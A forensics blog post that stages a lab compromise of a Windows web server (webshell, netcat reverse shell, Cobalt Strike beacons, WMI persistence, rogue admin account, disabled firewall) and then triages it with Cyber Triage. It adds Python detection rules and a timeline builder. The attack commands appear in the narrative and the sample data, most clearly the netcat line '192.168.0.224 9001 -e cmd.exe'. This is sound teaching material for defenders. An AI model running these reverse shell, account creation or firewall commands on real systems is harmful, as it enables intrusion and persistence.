Hi Incident Responder
Today I am going to share my experience of using the Cyber Triage application to do the triage analysis of an incident.
I made a small simulation of a compromised application server, where the adversary compromises the server by exploiting web application functionality with the steps below:
- Exploit an unrestricted file upload vulnerability in the web application to upload a PHP webshell
- Use the webshell (404.php) to do some enumeration, such as browsing the server's file system
- Upload nc64.exe to the server through the webshell and use it to create a reverse shell
- Create persistence using a WMI technique
- Create a new user with admin privilege
- Disable the firewall
- Install a VNC server and open a remote desktop session to it from my Kali Linux
Below is the webshell that I use
I executed nc64.exe with the `-e cmd.exe` parameter so that it hands a command shell to whoever it connects to.
We got a callback from the victim machine for the reverse shell.
Cobalt Strike Beacon
After I got the shell, I upgraded the foothold to a Cobalt Strike beacon deployment to make it stealthier.
I also injected one more beacon into mysqld.exe to ensure that I still have a backup connection when the first beacon dies.
Now I have two beacons connected.
I used one of the Cobalt Strike Aggressor scripts to create the WMI persistence. I uploaded the beacon file to C:\Temp\artifact.exe.
Install VNC Server
Live Artefact Collection using Cyber Triage Agent
I am going to collect the artefacts using the live collection agent, which runs on the compromised host.
Let's create a new incident in Cyber Triage
and select Live Manual as the collection type. This makes Cyber Triage listen for a new connection from the agent, which will send the artefacts.
Start the collection. We need to copy the agent to the compromised host and run it there so that it collects the information and sends it back to the Cyber Triage server.
There are two ways to run a live collection: using the GUI or the command line. I am going to use the GUI in this tutorial. Select the collection types that you want; I wanted to gather everything, hence I selected all of them. Press Start to start the collection.
While the agent collects the information, the server also starts correlating the information from the agent. We can see that there are already 3 suspicious artefacts less than a minute into the collection. It takes less than 5 minutes to collect all the information from the compromised host.
Cyber Triage gives you an anomaly indication for every category, which helps to expedite the triage process.
Detecting the Reverse Shell
From the information below we can see that Cyber Triage correlated details from various sources to conclude that this is bad activity. The argument of nc64.exe, `192.168.0.224 9001 -e cmd.exe`, is the reverse shell command that we executed from the PHP shell, as shown in the picture above (see the reverse shell section). We can also identify that the parent of cmd.exe is httpd.exe, running with NT AUTHORITY\SYSTEM privilege. That is very suspicious on its own: a web server has no business spawning a command interpreter, and when it does so as SYSTEM the shell inherits full control of the host.
Detecting Malicious User Creation
Cyber Triage also notified us that cmd.exe was used to create a user, which is suspicious. It gathered this information from memory.
In the Active Connections category, we can find that mysqld.exe made an outbound connection to 192.168.0.224. This should be treated as suspicious: why would a database server make an outbound connection? From this simulation we know that we injected one of the Cobalt Strike beacons into the mysqld.exe process, so this artefact is mysqld.exe (the Cobalt Strike beacon) connecting to the Cobalt Strike C2 server. We can manually mark this connection as bad or suspicious, which updates Cyber Triage's correlation for the artefacts related to it.
We can also see that tvnserver.exe received an incoming connection from 192.168.0.224 (Kali Linux).
Mark Artefact as Bad/Suspicious
By marking the connection as bad, Cyber Triage gives us hints about other related artefacts that would also be bad. In the graph below we can see that the active connection, process, user account, file and listening port would also be bad. I marked the mysqld.exe (Cobalt Strike beacon) process and the NT AUTHORITY\SYSTEM account as compromised.
Let's mark nc64.exe as bad as well. This shows us where the file was located; we know that I uploaded nc64.exe using the PHP webshell.
Program Run is the history of Windows applications that have been executed; we can see that this information was extracted from the UserAssist registry key. Cyber Triage correlates it with the process information, so the parent process and arguments of the PowerShell execution are available to enhance our analysis.
We know that PowerShell was used to download and run the Cobalt Strike beacon to establish our first connection to the Cobalt Strike C2.
We can also see from the Processes artefact that mysqld.exe has a child process rundll32.exe. This is an indication of Cobalt Strike injection: rundll32.exe is the default spawnto process that Cobalt Strike spawns and injects into for its post-exploitation jobs, so a rundll32.exe child of a database server is a strong signal.
Cyber Triage flagged our WMI persistence mechanism. It gave two analysis justifications for flagging it: the application runs from a non-standard path, and it runs from the Temp folder.
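The findings above (web server spawning a shell, nc with `-e`, cmd.exe creating a user, mysqld.exe dialing out, rundll32.exe under mysqld.exe, a binary running from C:\Temp) are all simple relationships between process, connection and path artefacts. The following is an added example, not Cyber Triage code, that encodes those same relationships as rules over a constructed process and connection snapshot; every PID, path and command line in the sample records is an assumption made for the example, and `lineage()` shows the parent chain that makes "mark related artefacts as bad" possible.

```python
"""Toy triage rules over a constructed process and connection snapshot.
Added example, not Cyber Triage code. All PIDs, paths and sample records
are constructed for the example and mirror the artefacts the post describes.
"""
from dataclasses import dataclass

WEB_SERVERS = {"httpd.exe", "w3wp.exe", "nginx.exe", "tomcat8.exe"}
DB_SERVERS = {"mysqld.exe", "sqlservr.exe", "postgres.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
TEMP_DIRS = ("\\temp\\", "\\windows\\temp\\", "\\appdata\\local\\temp\\")


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    name: str       # image name, e.g. "cmd.exe"
    path: str       # full image path
    cmdline: str
    user: str


@dataclass(frozen=True)
class Conn:
    pid: int
    direction: str  # "in" or "out"
    remote: str     # remote ip:port


def lineage(procs, pid):
    """Image names from pid up its parent chain: [child, parent, grandparent, ...]."""
    by_pid = {p.pid: p for p in procs}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:   # seen guards against PID reuse loops
        seen.add(pid)
        chain.append(by_pid[pid].name)
        pid = by_pid[pid].ppid
    return chain


def triage(procs, conns):
    """Return (pid, reason) findings; one pid may be flagged for several reasons."""
    by_pid = {p.pid: p for p in procs}
    findings = []
    for p in procs:
        parent = by_pid.get(p.ppid)
        pname = parent.name.lower() if parent else ""
        name, path = p.name.lower(), p.path.lower()
        args = f" {p.cmdline.lower()} "          # pad so " -e " matches at either end
        if pname in WEB_SERVERS and name in SHELLS:
            findings.append((p.pid, f"{parent.name} spawned {p.name} as {p.user}: webshell?"))
        if name.startswith("nc") and " -e " in args:
            findings.append((p.pid, "netcat with -e: reverse or bind shell"))
        if name == "net.exe" and " user " in args and " /add" in args:
            findings.append((p.pid, "local account creation (net user /add)"))
        if name == "netsh.exe" and "firewall" in args and "state off" in args:
            findings.append((p.pid, "host firewall disabled via netsh"))
        if pname in DB_SERVERS and name == "rundll32.exe":
            findings.append((p.pid, f"rundll32.exe under {parent.name}: Cobalt Strike default spawnto"))
        if any(t in path for t in TEMP_DIRS):
            findings.append((p.pid, f"executable running from temp path {p.path}"))
    for c in conns:
        p = by_pid.get(c.pid)
        if p and p.name.lower() in DB_SERVERS and c.direction == "out":
            findings.append((c.pid, f"{p.name} outbound to {c.remote}: databases rarely dial out"))
    return findings


# Constructed snapshot (assumed XAMPP-style paths); not real collected data.
SYSTEM = "NT AUTHORITY\\SYSTEM"
SAMPLE_PROCS = [
    Proc(400, 600, "httpd.exe", r"C:\xampp\apache\bin\httpd.exe", "httpd.exe -k runservice", SYSTEM),
    Proc(1200, 400, "cmd.exe", r"C:\Windows\System32\cmd.exe",
         "cmd.exe /c nc64.exe 192.168.0.224 9001 -e cmd.exe", SYSTEM),
    Proc(1204, 1200, "nc64.exe", r"C:\xampp\htdocs\uploads\nc64.exe",
         "nc64.exe 192.168.0.224 9001 -e cmd.exe", SYSTEM),
    Proc(1210, 1204, "cmd.exe", r"C:\Windows\System32\cmd.exe", "cmd.exe", SYSTEM),
    Proc(1300, 1210, "net.exe", r"C:\Windows\System32\net.exe", "net user backup Passw0rd! /add", SYSTEM),
    Proc(1310, 1210, "netsh.exe", r"C:\Windows\System32\netsh.exe",
         "netsh advfirewall set allprofiles state off", SYSTEM),
    Proc(900, 600, "mysqld.exe", r"C:\xampp\mysql\bin\mysqld.exe", "mysqld.exe --defaults-file=my.ini", SYSTEM),
    Proc(1500, 900, "rundll32.exe", r"C:\Windows\System32\rundll32.exe", "rundll32.exe", SYSTEM),
    Proc(1600, 700, "artifact.exe", r"C:\Temp\artifact.exe", r"C:\Temp\artifact.exe", SYSTEM),
]
SAMPLE_CONNS = [
    Conn(900, "out", "192.168.0.224:443"),
    Conn(1204, "out", "192.168.0.224:9001"),
    Conn(400, "in", "192.168.0.224:51234"),
]

if __name__ == "__main__":
    for pid, reason in triage(SAMPLE_PROCS, SAMPLE_CONNS):
        print(pid, " <- ".join(lineage(SAMPLE_PROCS, pid)), "|", reason)
```

Run it and every suspicious artefact in the post is flagged, with the parent chain printed next to it (net.exe <- cmd.exe <- nc64.exe <- cmd.exe <- httpd.exe), while the benign httpd.exe and the plain cmd.exe under nc64.exe are not. The rules are deliberately crude; the point is that each one is a relationship between two artefact types, which is exactly the correlation that is painful to do by hand across millions of records.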
Analyzing the files, we found our webshell under the web application folder. We can mark this as suspicious ourselves, since Cyber Triage does not flag it on its own. Interestingly, when I marked the webshell, Cyber Triage found a correlation to the inbound connection that accessed the file. That is correct: we accessed the webshell from our Kali Linux.
We also find nc64.exe, which was uploaded through the webshell and written to the web application folder.
Cyber Triage also gives us a very good timeline function that lets us understand what happened by browsing back through the history. It compiles the event sequence from various sources into one timeline table. As shown above, we can see that 6 minutes after I uploaded the webshell I also uploaded nc64.exe.
Interestingly, the adversary (me) tried multiple times to add the new user. We can see what happened during that period of time until the user was successfully created.
Cyber Triage also flagged our activity of disabling all the firewall rules.
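What the timeline view does is merge events from independent artefact sources (file creation, process execution, network connections) into one list ordered by time, so that gaps and repeated attempts become visible. The block below is an added example, not Cyber Triage's own timeline code: it builds such a merged timeline from constructed events that mirror the post (webshell upload, nc64.exe written six minutes later, several `net user` attempts before one succeeds). Timestamps, paths and the success/failure markers are all assumptions made for the example.

```python
"""Merge events from several artefact sources into one ordered timeline.
Added example, not Cyber Triage code. All events below are constructed;
the '(failed)' / '(success)' markers stand in for whatever outcome field
a real process artefact carries.
"""
from dataclasses import dataclass
from datetime import datetime, timedelta


@dataclass(frozen=True)
class Event:
    ts: datetime
    source: str   # artefact family the event came from: "file", "process", "network"
    detail: str


def at(s):
    """Parse a constructed 'YYYY-mm-dd HH:MM:SS' stamp; assumes all sources are already in UTC."""
    return datetime.strptime(s, "%Y-%m-%d %H:%M:%S")


# Constructed artefacts from three different sources (assumed XAMPP-style paths).
FILE_EVENTS = [
    Event(at("2021-05-01 10:02:10"), "file", r"created C:\xampp\htdocs\uploads\404.php"),
    Event(at("2021-05-01 10:08:10"), "file", r"created C:\xampp\htdocs\uploads\nc64.exe"),
    Event(at("2021-05-01 10:20:00"), "file", r"created C:\Temp\artifact.exe"),
]
PROC_EVENTS = [
    Event(at("2021-05-01 10:09:30"), "process", "nc64.exe 192.168.0.224 9001 -e cmd.exe (parent cmd.exe)"),
    Event(at("2021-05-01 10:12:01"), "process", "net user backup Passw0rd /add (failed)"),
    Event(at("2021-05-01 10:12:20"), "process", "net user backup P@ssw0rd /add (failed)"),
    Event(at("2021-05-01 10:12:45"), "process", "net user backup Passw0rd! /add (success)"),
    Event(at("2021-05-01 10:13:00"), "process", "net localgroup administrators backup /add (success)"),
]
NET_EVENTS = [
    Event(at("2021-05-01 10:02:05"), "network", "inbound 192.168.0.224 -> httpd.exe (webshell request)"),
    Event(at("2021-05-01 10:09:31"), "network", "outbound nc64.exe -> 192.168.0.224:9001"),
]


def build_timeline(*sources):
    """Flatten every source into one list ordered by timestamp (the 'super timeline')."""
    return sorted((e for src in sources for e in src), key=lambda e: e.ts)


def first_matching(timeline, needle):
    """First event whose detail mentions needle, or None."""
    return next((e for e in timeline if needle in e.detail), None)


def minutes_between(timeline, needle_a, needle_b):
    """Minutes from the first event mentioning needle_a to the first mentioning needle_b."""
    a, b = first_matching(timeline, needle_a), first_matching(timeline, needle_b)
    if a is None or b is None:
        return None
    return (b.ts - a.ts).total_seconds() / 60


def attempts_until_success(timeline, needle, success_marker="(success)"):
    """How many times a command was run up to and including its first success."""
    n = 0
    for e in timeline:
        if needle in e.detail:
            n += 1
            if success_marker in e.detail:
                return n
    return n


def around(timeline, needle, minutes=2):
    """Every event within +/- minutes of the first event mentioning needle."""
    pivot = first_matching(timeline, needle)
    if pivot is None:
        return []
    d = timedelta(minutes=minutes)
    return [e for e in timeline if pivot.ts - d <= e.ts <= pivot.ts + d]


if __name__ == "__main__":
    tl = build_timeline(FILE_EVENTS, PROC_EVENTS, NET_EVENTS)
    for e in tl:
        print(e.ts, f"{e.source:8}", e.detail)
    print("webshell -> nc64.exe upload gap (min):", minutes_between(tl, "404.php", "nc64.exe"))
    print("net user attempts until success:", attempts_until_success(tl, "net user backup"))
```

The merged list puts the inbound webshell request, the file write, the netcat process and its outbound connection in one sequence even though they came from three different artefact families, and `around()` gives the "what else happened in that window" view the post uses to look at the repeated user-creation attempts. The one thing to check before trusting any such merge on real data is that every source is normalised to the same timezone; the `at()` helper here simply assumes UTC.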
Cyber Triage helps a lot with triage analysis during incident response. It gives the incident responder context and an initial idea of what went wrong within the first hour of an incident. Cyber Triage also helps to standardize the documentation of the analysis, which makes it easier for the incident responder to hand the information over to the next team if required.
The best thing is that it correlates many sources into useful information. It is very hard to correlate millions of artefacts collected from a host. A long time ago I collected information using Eric Zimmerman's tools. These tools give good collection and flexibility, but the disadvantage is that we need to correlate the information between all the collected artefacts ourselves, which for me would not be effective (impossible) when triaging millions of artefacts in the first hour of an incident (I am sorry, Boss). Again, Cyber Triage helps in many ways for a quick investigation.
Note: I wrote this post based purely on my own experience; it has not been sponsored by any product. I just wanted to exercise myself and share some good information.